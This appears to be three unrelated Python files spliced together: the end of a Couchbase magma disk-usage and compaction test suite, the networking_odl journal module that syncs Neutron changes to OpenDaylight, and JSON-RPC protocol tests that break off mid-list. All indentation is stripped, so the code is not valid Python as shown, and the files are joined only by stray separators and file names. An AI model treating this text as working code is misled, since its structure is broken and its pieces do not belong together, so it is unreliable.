self.sleep(60, "sleep after triggering full compaction")
expected_tombstone_size = float(expected_ts_count * (self.key_size+ 64)) / 1024 / 1024
disk_usage_after_compaction = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)[0]
expected_size = 1 * self.disk_usage[self.disk_usage.keys()[0]] + expected_tombstone_size
self.log.info("Iteration--{}, disk usage after compaction == {}, expected_disk_size == {} ".
format(i+1, disk_usage_after_compaction, expected_size))
self.assertTrue(disk_usage_after_compaction <= expected_size ,
"Disk size after compaction == {}, exceeds expected size == {}".
format(disk_usage_after_compaction, expected_size))
###################################################################
'''
STEP - 5
-- ReCreation of docs.
'''
self.log.info("Step 5, Iteration= {}".format(i+1))
self.gen_create = copy.deepcopy(self.gen_delete)
self.doc_ops = "create"
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
###################################################################
'''
STEP - 6
-- Space Amplification Check after Recreation.
'''
self.log.info("Step 6, Iteration= {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Create Iteration{}, Disk Usage= {}MB \
".format(i+1, _res))
self.assertIs(_res > 2.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format("Create", _res, i+1,
self.disk_usage[self.disk_usage.keys()[0]]))
###################################################################
'''
STEP - 7
-- Validate data
-- Data validation is only for the creates in last iterations.
'''
self.log.info("Step 7, Iteration= {}".format(i+1))
self.validate_data("create", self.gen_create)
self.log.info("====test_multiUpdate_delete ends====")
def test_update_rev_update(self):
"""
STEPS:
-- Update num_items // 2 items.
-- Reverse update remaining num_items // 2 items.
-- If next.half is false skip above step
-- And reverse update items in first point
-- Check space amplification
-- Repeat above steps x times
-- Delete all the items
-- Check space Amplification
-- Recreate deleted items
-- Check Space Amplification
-- Repeat above steps for n times
-- After all iterations validate the data
"""
self.log.info("==== test_update_rev_update starts =====")
msg_stats = "Fragmentation value for {} stats exceeds\
the configured value"
msg = "{} Iteration= {}, Disk Usage = {}MB\
exceeds {} times from Actual disk usage = {}MB"
count = 0
mutated = 1
for i in range(self.test_itr):
self.log.debug("Step 1, Iteration= {}".format(i+1))
#######################################################################
'''
STEP - 1, Update Items, update_itr times
-- Update n // 2 items
-- If self.next_half is true
-- Update remaining n//2 items
-- Else, again update items in
reverse order in first point
'''
while count < self.update_itr:
tasks_info = dict()
self.doc_ops = "update"
self.gen_update = self.genrate_docs_basic(0, self.num_items //2,
mutate=mutated)
tem_tasks_info = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=False)
tasks_info.update(tem_tasks_info.items())
if self.next_half:
start = - (self.num_items - 1)
end = - (self.num_items // 2 - 1)
self.gen_update = self.genrate_docs_basic(start, end,
mutate=mutated)
tem_tasks_info = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=False)
tasks_info.update(tem_tasks_info.items())
for task in tasks_info:
self.task_manager.get_task_result(task)
self.bucket_util.verify_doc_op_task_exceptions(
tasks_info, self.cluster)
self.bucket_util.log_doc_ops_task_failures(tasks_info)
mutated += 1
if not self.next_half:
start = - (self.num_items - 1)
end = - (self.num_items // 2 - 1)
self.gen_update = self.genrate_docs_basic(start, end,
mutate=mutated)
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
mutated += 1
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=3600)
###################################################################
'''
STEP - 2
-- Space Amplification check after each update iteration.
'''
self.log.debug("Step 2, Iteration= {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Update Iteration- {}, Disk Usage- {}MB\
".format(count+1, _res))
self.assertIs(
_res > 2.5 * self.disk_usage[self.disk_usage.keys()[0]],
False, msg.format("update", count+1, _res, 2.5,
self.disk_usage[self.disk_usage.keys()[0]]))
count += 1
self.update_itr += self.update_itr
###################################################################
'''
STEP - 3
-- Delete all the items.
'''
self.log.debug("Step 3, Iteration {}".format(i+1))
self.doc_ops = "delete"
self.delete_start = 0
self.delete_end = self.num_items
if self.rev_del:
self.delete_start = -int(self.num_items - 1)
self.delete_end = 1
self.generate_docs(doc_ops="delete")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
###################################################################
'''
STEP - 4
-- Space Amplification Check after deletion.
'''
self.log.debug("Step 4, Iteration {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Delete Iteration {}, Disk Usage- {}MB\
".format(i+1, _res))
self.assertIs(
_res > 1 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format(
"delete", i+1, _res, 1,
self.disk_usage[self.disk_usage.keys()[0]]))
###################################################################
'''
STEP - 5
-- ReCreation of docs.
'''
self.log.debug("Step 5, Iteration= {}".format(i+1))
self.gen_create = copy.deepcopy(self.gen_delete)
self.doc_ops = "create"
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
###################################################################
'''
STEP - 6
-- Space Amplification Check after Recreation.
'''
self.log.debug("Step 6, Iteration= {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Create Iteration{}, Disk Usage= {}MB \
".format(i+1, _res))
self.assertIs(_res > 1.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format("Create", _res, i+1, 1.5,
self.disk_usage[self.disk_usage.keys()[0]]))
###################################################################
'''
STEP - 7
-- Validate data
-- Data validation is only for the creates in last iterations.
'''
self.log.debug("Step 7, Iteration= {}".format(i+1))
self.validate_data("create", self.gen_create)
self.log.info("====test_update_rev_update ends====")
def test_update_single_doc_n_times(self):
"""
Test Focus: Update single/same doc n times
Note: MultiThreading is used to update
single doc, since we are not worried
about what should be the final mutate
value of the document semaphores have
been avoided. MultiThreading also speed up
the execution of test
"""
self.log.info("test_update_single_doc_n_times starts")
self.doc_ops = "update"
self.client = SDKClient([self.cluster.master],
self.cluster.buckets[0],
scope=CbServer.default_scope,
collection=CbServer.default_collection)
self.gen_update = self.genrate_docs_basic(start=0, end=1)
key, val = self.gen_update.next()
for node in self.cluster.nodes_in_cluster:
shell = RemoteMachineShellConnection(node)
shell.restart_couchbase()
shell.disconnect()
self.assertTrue(
self.bucket_util._wait_warmup_completed(
[self.cluster.master],
self.cluster.buckets[0],
wait_time=self.wait_timeout * 10))
def upsert_doc(start_num, end_num, key_obj, val_obj):
for i in range(start_num, end_num):
val_obj.put("mutated", i)
self.client.upsert(key_obj, val_obj)
threads = []
start = 0
end = 0
for _ in range(10):
start = end
end += 100000
th = threading.Thread(
target=upsert_doc, args=[start, end, key, val])
th.start()
threads.append(th)
for th in threads:
th.join()
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
# Space amplification check
msg_stats = "Fragmentation value for {} stats exceeds\
the configured value"
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.log.debug("Disk usage after updates {}".format(
disk_usage))
_res = disk_usage[0]
msg = "Disk Usage = {}MB exceeds 2.2 times \
from Actual disk usage = {}MB"
self.assertIs(
_res > 2.2 * self.disk_usage[
self.disk_usage.keys()[0]],
False,
msg.format(_res, self.disk_usage[self.disk_usage.keys()[0]]))
# Space amplification check ends
success, fail = self.client.get_multi([key],
self.wait_timeout)
self.assertIs(key in success, True,
msg="key {} doesn't exist\
".format(key))
actual_val = dict()
expected_val = Json.loads(val.toString())
actual_val = Json.loads(success[key][
'value'].toString())
self.log.debug("Expected_val= {} and actual_val = {}\
".format(expected_val, actual_val))
self.assertIs(expected_val == actual_val, True,
msg="expected_val-{} != Actual_val-{}\
".format(expected_val, actual_val))
self.change_swap_space(self.cluster.nodes_in_cluster,
disable=False)
self.log.info("====test_update_single_doc_n_times ends====")
def test_move_val_btwn_key_and_seq_trees(self):
"""
Test Focus: Update items such that values moves
Sequence Tree and Key Trees.
STEPS:
-- Update items with new size , so that
items move from sequence tree to key
tree or vice versa
-- Do data validation
-- Again update items with initial size
-- Check space amplification
-- Again validate documents
"""
self.log.info("test_move_val_btwn_key_and_seq_trees starts")
msg_stats = "Fragmentation value for {} stats exceeds\
the configured value"
count = 0
keyTree, seqTree = (self.get_disk_usage(
self.buckets[0],
self.cluster.nodes_in_cluster)[2:4])
self.log.debug("Disk usage after pure creates {}".format((
self.disk_usage, keyTree, seqTree)))
initial_doc_size = self.doc_size
upsert_size = 0
if self.doc_size < 32:
upsert_size = 2048
while count < self.test_itr:
self.log.info("Update Iteration count == {}".format(count))
for node in self.cluster.nodes_in_cluster:
shell = RemoteMachineShellConnection(node)
shell.kill_memcached()
shell.disconnect()
self.assertTrue(self.bucket_util._wait_warmup_completed(
[self.cluster.master],
self.cluster.buckets[0],
wait_time=self.wait_timeout * 10))
#######################################################################
'''
STEP - 1, Update items with changed/new size
'''
self.log.info("Step 1, Iteration= {}".format(count+1))
self.doc_ops = "update"
self.update_start = 0
self.update_end = self.num_items
if self.rev_update:
self.update_start = -int(self.num_items - 1)
self.update_end = 1
self.doc_size = upsert_size
self.generate_docs()
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
if upsert_size > 32:
seqTree_update = (self.get_disk_usage(
self.buckets[0],
self.cluster.nodes_in_cluster)[-1])
self.log.info("For upsert_size > 32 seqIndex usage-{}\
".format(seqTree_update))
#######################################################################
'''
STEP - 2, Validate data after initial upsert
'''
self.log.info("Step 2, Iteration= {}".format(count+1))
self.validate_data("update", self.gen_update)
#######################################################################
'''
STEP - 3, Updating items with changed doc size
to move between tress
'''
self.log.info("Step 3, Iteration= {}".format(count+1))
self.doc_size = initial_doc_size
self.generate_docs()
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
#######################################################################
'''
STEP - 4, Space Amplification Checks
'''
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("disk usage after upsert count {} is {}MB \
".format(count+1, _res))
if self.doc_size > 32:
self.assertIs(
_res > 1.5 * self.disk_usage[self.disk_usage.keys()[0]],
False, "Disk Usage {} After \
update count {} exceeds \
Actual disk usage {} by 1.5 \
times".format(_res, count+1,
self.disk_usage[self.disk_usage.keys()[0]]))
else:
self.assertIs(disk_usage[3] > 0.5 * seqTree_update,
False, " Current seqTree usage-{} exceeds by'\n'\
0.5 times from the earlier '\n' \
seqTree usage (after update) -{} \
".format(disk_usage[3], seqTree_update))
count += 1
#######################################################################
'''
STEP - 5, Data validation
'''
self.log.info("Step 5, Iteration= {}".format(count+1))
self.validate_data("update", self.gen_update)
#######################################################################
self.change_swap_space(self.cluster.nodes_in_cluster, disable=False)
self.log.info("====test_move_docs_btwn_key_and_seq_trees ends====")
def test_parallel_create_update(self):
"""
STEPS:
-- Create new items and update already
existing items
-- Check disk_usage after each Iteration
-- Data validation for last iteration
"""
self.log.info("test_parallel_create_update starts")
count = 1
init_items = copy.deepcopy(self.num_items)
self.doc_ops = "create:update"
self.update_start = 0
self.update_end = self.num_items
while count <= self.test_itr:
self.log.info("Iteration {}".format(count))
self.create_start = self.num_items
self.create_end = self.num_items+init_items
if self.rev_write:
self.create_start = -int(self.num_items+init_items - 1)
self.create_end = -int(self.num_items - 1)
self.log.info("Iteration : {}, create_start {} and create_end {}"
.format(count, self.create_start, self.create_end))
self.log.info("Iteration : {}, update_start {} and update_end {}"
.format(count, self.update_start, self.update_end))
self.generate_docs()
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
if count == self.test_itr:
self.validate_data("update", self.gen_update)
self.update_start = copy.deepcopy(self.create_start)
self.update_end = copy.deepcopy(self.create_end)
disk_usage = self.get_disk_usage(
self.buckets[0],
self.cluster.nodes_in_cluster)
if self.doc_size <= 32:
self.assertIs(
disk_usage[2] >= disk_usage[3], True,
"seqIndex usage = {}MB'\n' \
after Iteration {}'\n' \
exceeds keyIndex usage={}MB'\n' \
".format(disk_usage[3],
count,
disk_usage[2]))
self.assertIs(
disk_usage[0] > 2.2 * ((count+1) * self.disk_usage[
self.disk_usage.keys()[0]]),
False, "Disk Usage {}MB After '\n\'\
Updates exceeds '\n\'\
Actual disk usage {}MB by '\n'\
2.2 times".format(disk_usage[0],
((count+1) * self.disk_usage[
self.disk_usage.keys()[0]])))
count += 1
if not self.windows_platform:
self.change_swap_space(self.cluster.nodes_in_cluster, disable=False)
self.log.info("====test_parallel_create_update ends====")
def test_upsert_docs_n_times_with_intermittent_compaction(self):
"""
Test Focus: Update items n times and
during update keep triggering full
compaction
STEPS:
-- Update items n times
-- Keep triggering full compaction
-- After all iterations validate the data
"""
self.log.info("=====test_upsert_docs_n_times_with_intermittent_compaction starts=====")
self.mutate = 0
count = 0
self.doc_ops = "update"
self.update_start = 0
self.update_end = self.init_items_per_collection
def full_compaction():
self.stop_compaction = False
loop_itr = 1
while not self.stop_compaction:
self.bucket_util._run_compaction(self.cluster,
number_of_times=1)
self.sleep(5, "Done with Compaction Iteration == {}, sleep before next compaction".
format(loop_itr))
loop_itr += 1
self.compaction_th = threading.Thread(target=full_compaction)
self.compaction_th.start()
while count < self.test_itr:
self.log.info("Iteration == {}".format(count+1))
#######################################################################
'''
STEP - 1, Update Items
'''
self.generate_docs(doc_ops="update")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
count += 1
self.stop_compaction = True
self.compaction_th.join()
'''
STEP - 2, Data Validation
'''
self.validate_data("update", self.gen_update)
self.log.info("=====test_upsert_docs_n_times_with_intermittent_compaction ends=====")
|
journal.py
|
# Copyright (c) 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from datetime import datetime
import threading
import time
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib import context as nl_context
from neutron_lib.db import api as db_api
from neutron_lib.plugins import directory
from oslo_config import cfg
from oslo_db import exception
from oslo_log import log as logging
from requests import exceptions
from networking_odl.common import client
from networking_odl.common import constants as odl_const
from networking_odl.common import filters
from networking_odl.common import utils
from networking_odl.db import db
from networking_odl.journal import dependency_validations
LOG = logging.getLogger(__name__)
MAKE_URL = {}
LOG_ENTRY_TEMPLATE = ("%(log_type)s (Entry ID: %(entry_id)s) - %(op)s "
"%(obj_type)s %(obj_id)s (Time stamp: %(timestamp)s)")
LOG_RECORDED = 'Recorded'
LOG_PROCESSING = 'Processing'
LOG_COMPLETED = 'Completed'
LOG_ERROR_PROCESSING = 'Error while processing'
def call_thread_on_end(func):
def new_func(obj, *args, **kwargs):
return_value = func(obj, *args, **kwargs)
obj.journal.set_sync_event()
return return_value
return new_func
def _enrich_port(plugin_context, ml2_context, object_type, operation, data):
"""Enrich the port with additional information needed by ODL"""
# NOTE(yamahata): work around of ODL neutron northbound
# It passes security groups in port as list of dict for historical reasons.
# keep its format for compatibility.
# TODO(yamahata): drop this format conversion.
if data[odl_const.ODL_SGS]:
groups = [{'id': id_} for id_ in data['security_groups']]
else:
groups = []
new_data = copy.deepcopy(data)
new_data[odl_const.ODL_SGS] = groups
# NOTE(yamahata): work around for port creation for router
# tenant_id=''(empty string) is passed when port is created
# by l3 plugin internally for router.
# On the other hand, ODL doesn't accept empty string for tenant_id.
# In that case, deduce tenant_id from network_id for now.
# Right fix: modify Neutron so that don't allow empty string
# for tenant_id even for port for internal use.
# TODO(yamahata): eliminate this work around when neutron side
# is fixed
# assert port['tenant_id'] != ''
if ('tenant_id' not in new_data or new_data['tenant_id'] == ''):
if ml2_context:
network = ml2_context._network_context._network
else:
plugin = directory.get_plugin()
network = plugin.get_network(plugin_context,
new_data['network_id'])
new_data['tenant_id'] = network['tenant_id']
return new_data
def _log_entry(log_type, entry, log_level=logging.INFO, **kwargs):
delta = datetime.now() - datetime.min
timestamp = delta.total_seconds()
log_dict = {'log_type': log_type, 'op': entry.operation,
'obj_type': entry.object_type, 'obj_id': entry.object_uuid,
'entry_id': entry.seqnum, 'timestamp': timestamp}
LOG.log(log_level, LOG_ENTRY_TEMPLATE, log_dict, **kwargs)
def record(plugin_context, object_type, object_uuid, operation, data,
ml2_context=None):
if (object_type == odl_const.ODL_PORT and
operation in (odl_const.ODL_CREATE, odl_const.ODL_UPDATE)):
data = _enrich_port(
plugin_context, ml2_context, object_type, operation, data)
# Calculate depending_on on other journal entries
depending_on = dependency_validations.calculate(
plugin_context, operation, object_type, object_uuid, data)
# NOTE(mpeterson): Between the moment that a dependency is calculated and
# the new entry is recorded in the journal, an operation can ocurr that
# would make the dependency irrelevant. In that case we request a retry.
# For more details, read the commit message that introduced this comment.
try:
entry = db.create_pending_row(
plugin_context, object_type, object_uuid, operation, data,
depending_on=depending_on)
except exception.DBReferenceError as e:
raise exception.RetryRequest(e)
_log_entry(LOG_RECORDED, entry)
LOG.debug('Entry with ID %(entry_id)s depends on these entries: '
'%(depending_on)s',
{'entry_id': entry.seqnum,
'depending_on': [d.seqnum for d in depending_on]})
@db_api.retry_if_session_inactive()
@db_api.CONTEXT_WRITER.savepoint
def entry_complete(context, entry):
if cfg.CONF.ml2_odl.completed_rows_retention == 0:
db.delete_row(context, entry)
else:
db.update_db_row_state(context, entry, odl_const.COMPLETED)
db.delete_dependency(context, entry)
@db_api.retry_if_session_inactive()
@db_api.CONTEXT_WRITER.savepoint
def entry_reset(context, entry):
db.update_db_row_state(context, entry, odl_const.PENDING)
@db_api.retry_if_session_inactive()
@db_api.CONTEXT_WRITER.savepoint
def entry_update_state_by_retry_count(context, entry, retry_count):
db.update_pending_db_row_retry(context, entry, retry_count)
def _make_url(row):
url_object = utils.make_url_object(row.object_type)
urlpath = ''
if row.operation == odl_const.ODL_CREATE:
urlpath = url_object
else:
urlpath = url_object + '/' + row.object_uuid
return urlpath
def register_url_builder(object_type, method):
MAKE_URL[object_type] = method
def _build_url(row):
return MAKE_URL.get(row.object_type, _make_url)(row)
class OpenDaylightJournalThread(object):
"""Thread worker for the OpenDaylight Journal Database."""
# make those parameter configurable?
_RETRY_SLEEP_MIN = 0.1
_RETRY_SLEEP_MAX = 60
def __init__(self, start_thread=True):
self.client = client.OpenDaylightRestClient.create_client()
self._max_retry_count = cfg.CONF.ml2_odl.retry_count
self._sleep_time = self._RETRY_SLEEP_MIN
self.event = threading.Event()
self._odl_sync_thread = self._create_odl_sync_thread()
self._odl_sync_thread_stop = threading.Event()
if start_thread:
self.start()
def _create_odl_sync_thread(self):
return threading.Thread(name='sync', target=self.run_sync_thread)
def start(self):
# Start the sync thread
LOG.debug("Starting a new sync thread")
if self._odl_sync_thread_stop.is_set():
self._odl_sync_thread_stop.clear()
self._odl_sync_thread = self._create_odl_sync_thread()
if not self._odl_sync_thread.is_alive():
self._odl_sync_thread.start()
def stop(self, timeout=None):
"""Allows to stop the sync thread.
Args:
timeout (float): Time in seconds to wait for joining or None for
no timeout.
"""
# Stop the sync thread
LOG.debug("Stopping the sync thread")
if self._odl_sync_thread.is_alive():
self._odl_sync_thread_stop.set()
# Process the journal one last time before stopping.
self.set_sync_event()
self._odl_sync_thread.join(timeout)
def set_sync_event(self):
self.event.set()
@staticmethod
def _json_data(row):
data = copy.deepcopy(row.data)
filters.filter_for_odl(row.object_type, row.operation, data)
if row.operation == odl_const.ODL_CREATE:
method = 'post'
to_send = {row.object_type: data}
elif row.operation == odl_const.ODL_UPDATE:
method = 'put'
to_send = {row.object_type: data}
elif row.operation == odl_const.ODL_DELETE:
method = 'delete'
to_send = None
return method, _build_url(row), to_send
def run_sync_thread(self):
while not self._odl_sync_thread_stop.is_set():
try:
self.event.wait()
self.event.clear()
self.sync_pending_entries()
except Exception:
# Catch exceptions to protect the thread while running
LOG.exception("Error on run_sync_thread")
def sync_pending_entries(self):
LOG.debug("Start processing journal entries")
context = nl_context.get_admin_context()
entry = db.get_oldest_pending_db_row_with_lock(context)
if entry is None:
LOG.debug("No journal entries to process")
return
while entry is not None:
stop_processing = self._sync_entry(context, entry)
if stop_processing:
break
entry = db.get_oldest_pending_db_row_with_lock(context)
LOG.debug("Finished processing journal entries")
def _retry_sleep(self):
# When something happened in the connection to ODL, don't busy loop
# because it's likely to hit same issue.
# Wait for a while for recovery
time.sleep(self._sleep_time)
self._sleep_time = min(self._sleep_time * 2, self._RETRY_SLEEP_MAX)
def _retry_reset(self):
self._sleep_time = self._RETRY_SLEEP_MIN
def _sync_entry(self, context, entry):
_log_entry(LOG_PROCESSING, entry)
method, urlpath, to_send = self._json_data(entry)
# TODO(mkolesni): This logic is weirdly written, need to refactor it.
try:
self.client.sendjson(method, urlpath, to_send)
registry.publish(entry.object_type, odl_const.BEFORE_COMPLETE,
self,
payload=events.DBEventPayload(
context,
metadata={'operation': entry.operation,
'row': entry}))
entry_complete(context, entry)
self._retry_reset()
_log_entry(LOG_COMPLETED, entry)
except exceptions.ConnectionError:
# Don't raise the retry count, just log an error & break
entry_reset(context, entry)
LOG.error("Cannot connect to the OpenDaylight Controller,"
" will not process additional entries")
self._retry_sleep()
return True
except Exception:
_log_entry(LOG_ERROR_PROCESSING, entry,
log_level=logging.ERROR, exc_info=True)
entry_update_state_by_retry_count(
context, entry, self._max_retry_count)
return False
|
tests.py
|
"""
These are mostly tests taken verbatim from the JSON RPC v2 Spec document:
http://groups.google.com/group/json-rpc/web/json-rpc-2-0
JSON-RPC v1 tests will be coming soon, as will tests for library "features"
like class translation, etc.
"""
from jsonrpctcp import connect, config, history
from jsonrpctcp.server import Server
from jsonrpctcp import logger
from jsonrpctcp.errors import ProtocolError, EncryptionMissing
import unittest
import os
import time
try:
import json
except ImportError:
import simplejson as json
from threading import Thread
import signal
import logging
CLIENT = connect('127.0.0.1', 8000)
class TestCompatibility(unittest.TestCase):
def setUp(self):
pass
# Version 2.0 Tests
def test_positional(self):
""" Positional arguments in a single call """
result = CLIENT.subtract(23, 42)
self.assertTrue(result == -19)
result = CLIENT.subtract(42, 23)
self.assertTrue(result == 19)
request = json.loads(history.request)
response = json.loads(history.response)
verify_request = {
"jsonrpc": "2.0", "method": "subtract",
"params": [42, 23], "id": request['id']
}
verify_response = {
"jsonrpc": "2.0", "result": 19, "id": request['id']
}
self.assertTrue(request == verify_request)
self.assertTrue(response == verify_response)
def test_named(self):
""" Named arguments in a single call """
result = CLIENT.subtract(subtrahend=23, minuend=42)
self.assertTrue(result == 19)
result = CLIENT.subtract(minuend=42, subtrahend=23)
self.assertTrue(result == 19)
request = json.loads(history.request)
response = json.loads(history.response)
verify_request = {
"jsonrpc": "2.0", "method": "subtract",
"params": {"subtrahend": 23, "minuend": 42},
"id": request['id']
}
verify_response = {
"jsonrpc": "2.0", "result": 19, "id": request['id']
}
self.assertTrue(request == verify_request)
self.assertTrue(response == verify_response)
def test_notification(self):
""" Testing a notification (response should be null) """
result = CLIENT._notification.update(1, 2, 3, 4, 5)
self.assertTrue(result == None)
request = json.loads(history.request)
response = history.response
verify_request = {
"jsonrpc": "2.0", "method": "update", "params": [1,2,3,4,5]
}
verify_response = ''
self.assertTrue(request == verify_request)
self.assertTrue(response == verify_response)
def test_non_existent_method(self):
""" Testing a non existent method (raises -32601) """
self.assertRaises(ProtocolError, CLIENT.foobar)
request = json.loads(history.request)
response = json.loads(history.response)
verify_request = {
"jsonrpc": "2.0", "method": "foobar", "id": request['id']
}
verify_response = {
"jsonrpc": "2.0",
"error":
{"code": -32601, "message": response['error']['message']},
"id": request['id']
}
self.assertTrue(request == verify_request)
self.assertTrue(response == verify_response)
def test_invalid_json(self):
""" Tests an invalid JSON string (raises -32700) """
invalid_json = '{"jsonrpc": "2.0", "method": "foobar, '+ \
'"params": "bar", "baz]'
response = CLIENT._send_and_receive(invalid_json)
response = json.loads(history.response)
verify_response = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32700,'+
' "message": "Parse error."}, "id": null}'
)
verify_response['error']['message'] = response['error']['message']
self.assertTrue(response == verify_response)
def test_invalid_request(self):
invalid_request = '{"jsonrpc": "2.0", "method": 1, "params": "bar"}'
response = CLIENT._send_and_receive(invalid_request)
response = json.loads(history.response)
verify_response = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32600, '+
'"message": "Invalid Request."}, "id": null}'
)
verify_response['error']['message'] = response['error']['message']
self.assertTrue(response == verify_response)
def test_batch_invalid_json(self):
invalid_request = '[ {"jsonrpc": "2.0", "method": "sum", '+ \
'"params": [1,2,4], "id": "1"},{"jsonrpc": "2.0", "method" ]'
response = CLIENT._send_and_receive(
invalid_request, batch=True
)
response = json.loads(history.response)
verify_response = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32700,'+
'"message": "Parse error."}, "id": null}'
)
verify_response['error']['message'] = response['error']['message']
self.assertTrue(response == verify_response)
def test_empty_array(self):
invalid_request = '[]'
response = CLIENT._send_and_receive(invalid_request)
response = json.loads(history.response)
verify_response = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32600, '+
'"message": "Invalid Request."}, "id": null}'
)
verify_response['error']['message'] = response['error']['message']
self.assertTrue(response == verify_response)
def test_nonempty_array(self):
invalid_request = '[1,2]'
request_obj = json.loads(invalid_request)
response = CLIENT._send_and_receive(invalid_request)
response = json.loads(history.response)
self.assertTrue(len(response) == len(request_obj))
for resp in response:
verify_resp = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32600, '+
'"message": "Invalid Request."}, "id": null}'
)
verify_resp['error']['message'] = resp['error']['message']
self.assertTrue(resp == verify_resp)
def test_batch(self):
multicall = CLIENT._batch()
multicall.sum(1,2,4)
multicall._notification.notify_hello(7)
multicall.subtract(42,23)
multicall.foo.get(name='myself')
multicall.get_data()
job_requests = [j._request() for j in multicall._requests]
job_requests.insert(3, {"foo": "boo"})
json_requests = '[%s]' % ','.join(
map(lambda x:json.dumps(x), job_requests)
)
requests = json.loads(json_requests)
response_text = CLIENT._send_and_receive(json_requests, batch=True)
responses = json.loads(response_text)
verify_requests = json.loads("""[
{"jsonrpc": "2.0", "method": "sum", "params": [1,2,4], "id": "1"},
{"jsonrpc": "2.0", "method": "notify_hello", "params": [7]},
{"jsonrpc": "2.0", "method": "subtract", "params": [42,23], "id": "2"},
{"foo": "boo"},
{"jsonrpc": "2.0", "method": "foo.get", "params": {"name": "myself"}, "id": "5"},
{"jsonrpc": "2.0", "method": "get_data", "id": "9"}
]""")
# Thankfully, these are in order so testing is pretty simple.
verify_responses = json.loads("""[
{"jsonrpc": "2.0", "result": 7, "id": "1"},
{"jsonrpc": "2.0", "result": 19, "id": "2"},
{"jsonrpc": "2.0", "error": {"code": -32600, "message": "Invalid Request."}, "id": null},
